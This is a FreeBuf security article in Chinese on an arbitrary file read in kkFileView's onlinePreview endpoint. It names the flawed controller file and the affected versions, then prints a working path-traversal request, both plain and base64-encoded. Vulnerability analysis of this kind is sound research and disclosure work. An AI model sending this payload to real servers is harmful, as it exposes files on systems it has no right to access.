kkFileView历史漏洞总结 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

kkFileView历史漏洞总结

2024-12-10 13:26:16

所属地北京

本文由创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

kkFileView onlinePreview 文件读取漏洞

kkFileView 是一个基于 Java 开发的开源文件在线预览项目，旨在为开发者提供一个方便的、无需开发复杂前端代码就能实现文件在线预览的解决方案。其支持预览多种类型的文件，例如 Office 文档、PDF、文本文件以及图片等。

在src/main/java/cn/keking/web/controller/OnlinePreviewController.java文件的onlinePreview接口对url参数没有进行过滤，导致了任意文件读取。

kkFileview <= 4.1.0 （网上都说漏洞在3.6.0之下，笔者下载了3.6.0--4.4.0发现这个漏洞持续到4.1.0）

下载想要的版本，在idea下运行

1733807797_6757ceb5aade9b286887f.png!small?1733807793466

poc

/onlinePreview?url=http:/1/?fullfilename=../../../../pom.xml

base64加密：

/onlinePreview?url=aHR0cDovMSEvP2Z1bGxmaWxlbmFtZT0uLi8uLi8uLi8uLi9wb20ueG1s

# 漏洞 # 漏洞分析

已在FreeBuf发表 0 篇文章

本文为独立观点，未经允许不得转载，授权请联系FreeBuf客服小蜜蜂，微信：freebee2022

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多